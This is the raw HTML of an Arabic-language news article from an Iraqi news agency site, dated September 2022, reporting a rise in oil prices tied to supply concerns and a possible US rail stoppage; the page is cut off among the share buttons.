	<!DOCTYPE html>
		<!--[if IE 8]>
	<html class="ie ie8" dir="rtl" lang="ar"> <![endif]-->
	<!--[if IE 9]>
	<html class="ie ie9" dir="rtl" lang="ar"> <![endif]-->
	<!--[if gt IE 9]><!-->
<html dir="rtl" lang="ar"> <!--<![endif]-->
	<head>
				<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="pingback" href="https://mustaqila.com/xmlrpc.php"/>

		
<style id="jetpack-boost-critical-css">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</style><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO Premium plugin v18.9 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ -->
	<title>ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا | وكالة الصحافة المستقلة</title>
	<link rel="canonical" href="https://mustaqila.com/ارتفاع-اسعار-النفط-بسبب-توقف-وشيك-للسك/" />
	<meta property="og:locale" content="ar_AR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا" />
	<meta property="og:description" content="المستقلة /- ارتفعت أسعار النفط، يوم الخميس، مع المخاوف بشأن الإمدادات وتوقف وشيك للسكك الحديدية في الولايات المتحدة، أكبر مستهلك للخام في العالم . وارتفعت العقود الآجلة لخام برنت 38 سنتا أو 0.4 بالمئة إلى 94.48 دولاراً للبرميل بحلول الساعة 03:13 بتوقيت جرينتش، بينما ارتفع خام غرب تكساس الوسيط الأمريكي 46 سنتا أو 0.5 بالمئة [&hellip;]" />
	<meta property="og:url" content="https://mustaqila.com/ارتفاع-اسعار-النفط-بسبب-توقف-وشيك-للسك/" />
	<meta property="og:site_name" content="وكالة الصحافة المستقلة" />
	<meta property="article:publisher" content="https://facebook.com/mustaqila" />
	<meta property="article:published_time" content="2022-09-15T06:31:51+00:00" />
	<meta property="og:image" content="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/oil.jpg" />
	<meta property="og:image:width" content="1194" />
	<meta property="og:image:height" content="732" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="author" content="Abdulmalk" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@mustaqila_iq" />
	<meta name="twitter:site" content="@mustaqila_iq" />
	<meta name="twitter:label1" content="كُتب بواسطة" />
	<meta name="twitter:data1" content="Abdulmalk" />
	<meta name="twitter:label2" content="وقت القراءة المُقدّر" />
	<meta name="twitter:data2" content="دقيقتان" />
	
	<!-- / Yoast SEO Premium plugin. -->


<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel="alternate" type="application/rss+xml" title="وكالة الصحافة المستقلة &laquo; الخلاصة" href="https://mustaqila.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="وكالة الصحافة المستقلة &laquo; خلاصة التعليقات" href="https://mustaqila.com/comments/feed/" />

<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<noscript><link rel='stylesheet' id='wp-block-library-rtl-css'  href='https://c0.wp.com/c/6.0.2/wp-includes/css/dist/block-library/style-rtl.min.css' type='text/css' media='all' />
</noscript><link rel='stylesheet' id='wp-block-library-rtl-css'  href='https://c0.wp.com/c/6.0.2/wp-includes/css/dist/block-library/style-rtl.min.css' type='text/css' media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<noscript><link rel='stylesheet' id='mediaelement-css'  href='https://c0.wp.com/c/6.0.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' />
</noscript><link rel='stylesheet' id='mediaelement-css'  href='https://c0.wp.com/c/6.0.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" />
<noscript><link rel='stylesheet' id='wp-mediaelement-css'  href='https://c0.wp.com/c/6.0.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' />
</noscript><link rel='stylesheet' id='wp-mediaelement-css'  href='https://c0.wp.com/c/6.0.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" />
<style id='global-styles-inline-css' type='text/css'>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</style>
<noscript><link crossorigin="anonymous" rel='stylesheet' id='better-framework-main-fonts-css'  href='https://fonts.googleapis.com/css?family=Lato:700,400%7CRoboto:400,500,900,700,400italic&#038;display=swap' type='text/css' media='all' />
</noscript><link crossorigin=media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" rel='stylesheet' id='better-framework-main-fonts-css'  href='https://fonts.googleapis.com/css?family=Lato:700,400%7CRoboto:400,500,900,700,400italic&#038;display=swap' type='text/css' media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" />
<noscript><link rel='stylesheet' id='jetpack_css-rtl-css'  href='https://c0.wp.com/p/jetpack/11.3.1/css/jetpack-rtl.css' type='text/css' media='all' />
</noscript><link rel='stylesheet' id='jetpack_css-rtl-css'  href='https://c0.wp.com/p/jetpack/11.3.1/css/jetpack-rtl.css' type='text/css' media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" />
<script type='text/javascript' src='https://c0.wp.com/c/6.0.2/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/6.0.2/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://mustaqila.com/wp-content/plugins/better-adsmanager/includes/libs/better-framework/assets/js/html5shiv.min.js?ver=3.15.0' id='bf-html5shiv-js'></script>
<![endif]-->
<!--[if lt IE 9]>
<script type='text/javascript' src='https://mustaqila.com/wp-content/plugins/better-adsmanager/includes/libs/better-framework/assets/js/respond.min.js?ver=3.15.0' id='bf-respond-js'></script>
<![endif]-->
<link rel="https://api.w.org/" href="https://mustaqila.com/wp-json/" /><link rel="alternate" type="application/json" href="https://mustaqila.com/wp-json/wp/v2/posts/517444" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://mustaqila.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://mustaqila.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 6.0.2" />
<link rel='shortlink' href='https://wp.me/p3Hg40-2aBS' />
<link rel="alternate" type="application/json+oembed" href="https://mustaqila.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmustaqila.com%2F%25d8%25a7%25d8%25b1%25d8%25aa%25d9%2581%25d8%25a7%25d8%25b9-%25d8%25a7%25d8%25b3%25d8%25b9%25d8%25a7%25d8%25b1-%25d8%25a7%25d9%2584%25d9%2586%25d9%2581%25d8%25b7-%25d8%25a8%25d8%25b3%25d8%25a8%25d8%25a8-%25d8%25aa%25d9%2588%25d9%2582%25d9%2581-%25d9%2588%25d8%25b4%25d9%258a%25d9%2583-%25d9%2584%25d9%2584%25d8%25b3%25d9%2583%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://mustaqila.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmustaqila.com%2F%25d8%25a7%25d8%25b1%25d8%25aa%25d9%2581%25d8%25a7%25d8%25b9-%25d8%25a7%25d8%25b3%25d8%25b9%25d8%25a7%25d8%25b1-%25d8%25a7%25d9%2584%25d9%2586%25d9%2581%25d8%25b7-%25d8%25a8%25d8%25b3%25d8%25a8%25d8%25a8-%25d8%25aa%25d9%2588%25d9%2582%25d9%2581-%25d9%2588%25d8%25b4%25d9%258a%25d9%2583-%25d9%2584%25d9%2584%25d8%25b3%25d9%2583%2F&#038;format=xml" />
<style>img#wpstats{display:none}</style>
	<meta name="google-site-verification" content="ZbTz3E0xb_Z6btbxbLTXl9vTmNeZCEfLaVwaiJX79bA" />
<meta name="google-site-verification" content="iYtF6fjzHElEQSOlP8DFOs--h_sQBINu4YeAEbhV5Q8" /
<script data-ad-client="ca-pub-1920816103235815" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>			<link rel="shortcut icon" href="https://i68.servimg.com/u/f68/11/87/36/37/favico10.png"><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<link rel="amphtml" href="https://mustaqila.com/%D8%A7%D8%B1%D8%AA%D9%81%D8%A7%D8%B9-%D8%A7%D8%B3%D8%B9%D8%A7%D8%B1-%D8%A7%D9%84%D9%86%D9%81%D8%B7-%D8%A8%D8%B3%D8%A8%D8%A8-%D8%AA%D9%88%D9%82%D9%81-%D9%88%D8%B4%D9%8A%D9%83-%D9%84%D9%84%D8%B3%D9%83/amp/">


<style>#amp-mobile-version-switcher{position:absolute;right:0;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{text-decoration:underline}</style><link rel="alternate" type="text/html" media="only screen and (max-width: 640px)" href="https://mustaqila.com/%D8%A7%D8%B1%D8%AA%D9%81%D8%A7%D8%B9-%D8%A7%D8%B3%D8%B9%D8%A7%D8%B1-%D8%A7%D9%84%D9%86%D9%81%D8%B7-%D8%A8%D8%B3%D8%A8%D8%A8-%D8%AA%D9%88%D9%82%D9%81-%D9%88%D8%B4%D9%8A%D9%83-%D9%84%D9%84%D8%B3%D9%83/amp/"><link rel='stylesheet' id='bf-minifed-css-1' href='https://mustaqila.com/wp-content/bs-booster-cache/1f0bf9ed83a183ddfdaaf6e605afb307.css' type='text/css' media='all' />
<link rel='stylesheet' id='7.7.0-1661412124' href='https://mustaqila.com/wp-content/bs-booster-cache/5098934434bea6ba88b81b3472b753ec.css' type='text/css' media='all' />
<link rel="icon" href="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=32%2C32&#038;ssl=1" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=192%2C192&#038;ssl=1" sizes="192x192" />
<link rel="apple-touch-icon" href="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=180%2C180&#038;ssl=1" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/uploads.mustaqila.com/2015/09/وكالةcropped-الصحافة-المستقلة.jpg4_.png?fit=270%2C270&#038;ssl=1" />

<!-- BetterFramework Head Inline CSS -->
<style>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</style>
<!-- /BetterFramework Head Inline CSS-->
<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>	</head>

<body class="rtl post-template-default single single-post postid-517444 single-format-standard bs-theme bs-publisher bs-publisher-clean-magazine active-light-box close-rh page-layout-2-col-right full-width active-sticky-sidebar active-ajax-search single-prim-cat-83 single-cat-83 single-cat-46  bs-hide-ha wpb-js-composer js-comp-ver-6.6.0 vc_responsive bs-ll-a" dir="rtl">
	<header id="header" class="site-header header-style-2 full-width" itemscope="itemscope" itemtype="https://schema.org/WPHeader">

		<section class="topbar topbar-style-1 hidden-xs hidden-xs">
	<div class="content-wrap">
		<div class="container">
			<div class="topbar-inner clearfix">

									<div class="section-links">
								<div  class="  better-studio-shortcode bsc-clearfix better-social-counter style-button not-colored in-4-col">
						<ul class="social-list bsc-clearfix"><li class="social-item facebook"><a href = "https://www.facebook.com/mustaqila" target = "_blank" > <i class="item-icon bsfi-facebook" ></i><span class="item-title" > فيسبوك </span> </a> </li> <li class="social-item twitter"><a href = "https://twitter.com/mustaqilaiq" target = "_blank" > <i class="item-icon bsfi-twitter" ></i><span class="item-title" > تويتر </span> </a> </li> <li class="social-item youtube"><a href = "https://youtube.com/channel/UC6CvPPPPwsUYHxrXbSpejzA" target = "_blank" > <i class="item-icon bsfi-youtube" ></i><span class="item-title" > يوتيوب </span> </a> </li> <li class="social-item instagram"><a href = "https://instagram.com/mustaqila_iq" target = "_blank" > <i class="item-icon bsfi-instagram" ></i><span class="item-title" > الانستاجرام </span> </a> </li> <li class="social-item rss"><a href = "https://mustaqila.com/feed/rss/" target = "_blank" > <i class="item-icon bsfi-rss" ></i><span class="item-title" > متابعة </span> </a> </li> 			</ul>
		</div>
							</div>
				
				<div class="section-menu">
						<div id="menu-top" class="menu top-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
		<nav class="top-menu-container">

			<ul id="top-navigation" class="top-menu menu clearfix bsm-pure">
									<li id="topbar-date" class="menu-item menu-item-date">
					<span
						class="topbar-date">الخميس, سبتمبر 15, 2022</span>
					</li>
					<li id="menu-item-351809" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy better-anim-fade menu-item-351809"><a href="https://mustaqila.com/privacypolicy/">سياسة الخصوصية</a></li>
<li id="menu-item-324301" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-324301"><a href="https://mustaqila.com/%d8%b9%d9%86-%d8%a7%d9%84%d9%88%d9%83%d8%a7%d9%84%d8%a9/">عن الوكالة</a></li>
<li id="menu-item-324300" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-324300"><a href="https://mustaqila.com/%d8%a7%d8%b1%d8%b3%d9%84-%d8%ae%d8%a8%d8%b1%d8%a7/">ارسل خبر او مقال</a></li>
<li id="menu-item-324302" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-324302"><a href="https://mustaqila.com/%d8%a7%d8%aa%d8%b5%d9%84-%d8%a8%d9%86%d8%a7/">اتصل بنا</a></li>
			</ul>

		</nav>
	</div>
				</div>
			</div>
		</div>
	</div>
</section>
		<div class="header-inner">
			<div class="content-wrap">
				<div class="container">
					<div class="row">
						<div class="row-height">
							<div class="logo-col col-xs-4">
								<div class="col-inside">
									<div id="site-branding" class="site-branding">
	<p  id="site-title" class="logo h1 img-logo">
	<a href="https://mustaqila.com/" itemprop="url" rel="home">
					<img id="site-logo" src="https://www.mustaqila.com/wp-content/uploads/2021/02/mustaqila_logo.png"
			     alt="وكالة الصحافة المستقلة"  />

			<span class="site-title">وكالة الصحافة المستقلة - اخبار العراق - سياسة - مال واعمال - اخبار فنية</span>
				</a>
</p>
</div><!-- .site-branding -->
								</div>
							</div>
															<div class="sidebar-col col-xs-8">
									<div class="col-inside">
										<aside id="sidebar" class="sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
											<div class="tqysxwz tqysxwz-pubadban tqysxwz-show-desktop tqysxwz-loc-header_aside_logo tqysxwz-align-right tqysxwz-column-1 tqysxwz-hide-on-phone tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape tqysxwz-clearfix no-bg-box-model"><div id="tqysxwz-324247-791549367" class="tqysxwz-container tqysxwz-type-code  tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape tqysxwz-hide-on-phone" itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="324247" data-type="code"><div id="tqysxwz-324247-791549367-place"></div></div></div>										</aside>
									</div>
								</div>
														</div>
					</div>
				</div>
			</div>
		</div>

		<div id="menu-main" class="menu main-menu-wrapper show-search-item menu-actions-btn-width-1" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
	<div class="main-menu-inner">
		<div class="content-wrap">
			<div class="container">

				<nav class="main-menu-container">
					<ul id="main-navigation" class="main-menu menu bsm-pure clearfix">
						<li id="menu-item-326611" class="menu-item menu-item-type-custom menu-item-object-custom better-anim-fade menu-item-326611"><a href="https://www.mustaqila.com/latest">كل الاخبار</a></li>
<li id="menu-item-210152" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-34 better-anim-fade menu-item-210152"><a href="https://mustaqila.com/political/">سياسية</a></li>
<li id="menu-item-210148" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-46 better-anim-fade menu-item-210148"><a href="https://mustaqila.com/economy/">اقتصادية</a></li>
<li id="menu-item-210149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-31 better-anim-fade menu-item-210149"><a href="https://mustaqila.com/security/">امنية</a></li>
<li id="menu-item-210151" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1055 better-anim-fade menu-item-210151"><a href="https://mustaqila.com/sport/">رياضية</a></li>
<li id="menu-item-210153" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-210153"><a href="https://mustaqila.com/health/">صحة</a></li>
<li id="menu-item-210150" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-907 better-anim-fade menu-item-210150"><a href="https://mustaqila.com/arts/">فن</a></li>
<li id="menu-item-210154" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-7 better-anim-fade menu-item-210154"><a href="https://mustaqila.com/general/">منوعات</a></li>
<li id="menu-item-210156" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-8 better-anim-fade menu-item-210156"><a href="https://mustaqila.com/international/">عربي و دولي</a>
<ul class="sub-menu">
	<li id="menu-item-210157" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-33 better-anim-fade menu-item-210157"><a href="https://mustaqila.com/international/world/">دولي</a></li>
	<li id="menu-item-210158" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-37 better-anim-fade menu-item-210158"><a href="https://mustaqila.com/international/arab-news/">عربي</a></li>
</ul>
</li>
<li id="menu-item-210159" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9 better-anim-fade menu-item-210159"><a href="https://mustaqila.com/technology/">علوم و تكنولوجيا</a></li>
<li id="menu-item-210160" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-30 better-anim-fade menu-item-210160"><a href="https://mustaqila.com/articles/">مقالات</a></li>
<li id="menu-item-405729" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children better-anim-fade menu-item-405729"><a href="#">حسب الدول</a>
<ul class="sub-menu">
	<li id="menu-item-407192" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-16487 better-anim-fade menu-item-407192"><a href="https://mustaqila.com/iq/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/iraq-1.png"></i>اخبار العراق</a></li>
	<li id="menu-item-467764" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-23821 better-anim-fade menu-item-467764"><a href="https://mustaqila.com/palestine/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/05/palestine.png"></i>اخبار فلسطين</a></li>
	<li id="menu-item-440480" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-17579 better-anim-fade menu-item-440480"><a href="https://mustaqila.com/egy/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/11/egypt.png"></i>اخبار مصر</a></li>
	<li id="menu-item-444502" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-20280 better-anim-fade menu-item-444502"><a href="https://mustaqila.com/ksa/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/02/saudi-arabia.png"></i>اخبار السعودية</a></li>
	<li id="menu-item-453695" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-21593 better-anim-fade menu-item-453695"><a href="https://mustaqila.com/jordan/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/jordan.png"></i>اخبار الاردن</a></li>
	<li id="menu-item-497367" class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-26210 better-anim-fade menu-item-497367"><a href="https://mustaqila.com/%d8%a7%d8%ae%d8%a8%d8%a7%d8%b1-%d9%82%d8%b7%d8%b1/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/01/qater.png"></i>اخبار قطر</a></li>
</ul>
</li>
					</ul><!-- #main-navigation -->
											<div class="menu-action-buttons width-1">
															<div class="search-container close">
									<span class="search-handler"><i class="fa fa-search"></i></span>

									<div class="search-box clearfix">
										<form role="search" method="get" class="search-form clearfix" action="https://mustaqila.com">
	<input type="search" class="search-field"
	       placeholder="بحث..."
	       value="" name="s"
	       title="البحث عن:"
	       autocomplete="off">
	<input type="submit" class="search-submit" value="بحث">
</form><!-- .search-form -->
									</div>
								</div>
														</div>
										</nav><!-- .main-menu-container -->

			</div>
		</div>
	</div>
</div><!-- .menu -->
	</header><!-- .header -->
	<div class="rh-header clearfix dark deferred-block-exclude">
		<div class="rh-container clearfix">

			<div class="menu-container close">
				<span class="menu-handler"><span class="lines"></span></span>
			</div><!-- .menu-container -->

			<div class="logo-container rh-img-logo">
				<a href="https://mustaqila.com/" itemprop="url" rel="home">
											<img src="https://i68.servimg.com/u/f68/11/87/36/37/logo_m12.png"
						     alt="وكالة الصحافة المستقلة"  />				</a>
			</div><!-- .logo-container -->
		</div><!-- .rh-container -->
	</div><!-- .rh-header -->
		<div class="main-wrap content-main-wrap">
		<nav role="navigation" aria-label="Breadcrumbs" class="bf-breadcrumb clearfix bc-top-style"><div class="container bf-breadcrumb-container"><ul class="bf-breadcrumb-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="3" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="bf-breadcrumb-item bf-breadcrumb-begin"><a itemprop="item" href="https://mustaqila.com" rel="home"><span itemprop="name">الصفحة الرئيسية</span></a><meta itemprop="position" content="1" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="bf-breadcrumb-item"><a itemprop="item" href="https://mustaqila.com/last/" ><span itemprop="name">اخر الاخبار</span></a><meta itemprop="position" content="2" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="bf-breadcrumb-item bf-breadcrumb-end"><span itemprop="name">ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا</span><meta itemprop="item" content="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a7%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d9%86%d9%81%d8%b7-%d8%a8%d8%b3%d8%a8%d8%a8-%d8%aa%d9%88%d9%82%d9%81-%d9%88%d8%b4%d9%8a%d9%83-%d9%84%d9%84%d8%b3%d9%83/"/><meta itemprop="position" content="3" /></li></ul></div></nav><div class="container adcontainer"><div class="tqysxwz tqysxwz-after-header tqysxwz-pubadban tqysxwz-show-phone tqysxwz-loc-header_after tqysxwz-align-center tqysxwz-column-1 tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape tqysxwz-hide-on-desktop tqysxwz-clearfix no-bg-box-model"><div id="tqysxwz-379834-737646314" class="tqysxwz-container tqysxwz-type-custom_code  tqysxwz-hide-on-desktop tqysxwz-hide-on-tablet-portrait tqysxwz-hide-on-tablet-landscape" itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="379834" data-type="custom_code"> <td class="alt2">
 
 </td> 

</div></div></div><div class="content-wrap">
		<main id="content" class="content-container">

		<div class="container layout-2-col layout-2-col-1 layout-right-sidebar layout-bc-before post-template-11">

			<div class="row main-section">
										<div class="col-sm-8 content-column">
							<div class="single-container">
																<article id="post-517444" class="post-517444 post type-post status-publish format-standard has-post-thumbnail  category-last category-economy single-post-content">
									<div
											class="post-header post-tp-11-header bs-lazy wfi"  title="ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/oil-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;oil-210x136.jpg&quot;,&quot;279&quot;:&quot;oil-279x220.jpg&quot;,&quot;357&quot;:&quot;oil-357x210.jpg&quot;,&quot;750&quot;:&quot;oil-750x430.jpg&quot;,&quot;1194&quot;:&quot;oil.jpg&quot;}}">
										<div class="post-header-inner">
											<div class="post-header-title">
																								<h1 class="single-post-title">
													<span class="post-title" itemprop="headline">ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا</span>
												</h1>
												<div class="post-meta single-post-meta">
				<span class="time"><time class="post-published updated"
			                         datetime="2022-09-15T09:31:51+03:00">في <b>سبتمبر 15, 2022</b></time></span>
			</div>
											</div>
										</div>
																			</div>
																		<div class="entry-content clearfix single-post-content">
										<p><strong>المستقلة /- ارتفعت أسعار النفط، يوم الخميس، مع المخاوف بشأن الإمدادات وتوقف وشيك للسكك الحديدية في الولايات المتحدة، أكبر مستهلك للخام في العالم .</strong></p>
 <p>وارتفعت العقود الآجلة لخام برنت 38 سنتا أو 0.4 بالمئة إلى 94.48 دولاراً للبرميل بحلول الساعة 03:13 بتوقيت جرينتش، بينما ارتفع خام غرب تكساس الوسيط الأمريكي 46 سنتا أو 0.5 بالمئة إلى 88.94 دولاراً.</p>
<div class="tqysxwz tqysxwz-post-middle tqysxwz-float-center tqysxwz-align-center tqysxwz-column-1 tqysxwz-clearfix no-bg-box-model"><div id="tqysxwz-325193-565463148" class="tqysxwz-container tqysxwz-type-code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="325193" data-type="code"><div id="tqysxwz-325193-565463148-place" class="tqysxwz-ll"></div></div></div> <p>وانخفض مؤشر الدولار بنسبة 0.14٪ أمس الأربعاء، متراجعًا عن مكاسب الجلسة السابقة، ورفع الطلب على السلع المقومة بالدولار مثل النفط الخام من حاملي العملات الأخرى.</p>
 <p>وقالت وكالة الطاقة الدولية (IEA)، أمس الأربعاء، إنها تتوقع تحولًا واسع النطاق من الغاز إلى النفط لأغراض التدفئة، قائلة إنه سيبلغ متوسط ​​700 ألف برميل يوميًا في أكتوبر/ تشرين الاول 2022 إلى مارس/ اذار 2023 &#8211; ضعف المستوى الذي كان عليه قبل عام، إلى جانب التوقعات الإجمالية لنمو العرض الضعيف، ساعد أيضًا في تعزيز السوق.</p>
 <p>كما أن الاحتمالية المتزايدة لتوقف السكك الحديدية في الولايات المتحدة بسبب النزاع العمالي المستمر تضيف دعمًا للسوق. حيث تتفاوض ثلاث نقابات على عقد جديد يمكن أن يؤثر على شحنات السكك الحديدية ، وهي مهمة لتسليم النفط الخام والمنتجات.</p> 									</div>
											<div class="post-share single-post-share bottom-share clearfix style-4">
			<div class="post-share-btn-group">
							</div>
						<div class="share-handler-wrap ">
				<span class="share-handler post-share-btn rank-default">
					<i class="bf-icon  fa fa-share-alt"></i>						<b class="text">شارك الخبر</b>
										</span>
				<span class="social-item whatsapp has-title"><a href="whatsapp://send?text=ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا %0A%0A https%3A%2F%2Fwp.me%2Fp3Hg40-2aBS" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-whatsapp','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-whatsapp"></i></span><span class="item-title">WhatsApp</span></a></span><span class="social-item telegram has-title"><a href="https://telegram.me/share/url?url=https%3A%2F%2Fwp.me%2Fp3Hg40-2aBS&text=ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-telegram','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-send"></i></span><span class="item-title">Telegram</span></a></span><span class="social-item viber has-title"><a href="viber://forward?text=ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا https%3A%2F%2Fwp.me%2Fp3Hg40-2aBS" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-viber','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon bsfi-viber"></i></span><span class="item-title">Viber</span></a></span><span class="social-item facebook has-title"><a href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwp.me%2Fp3Hg40-2aBS" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-facebook','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-facebook"></i></span><span 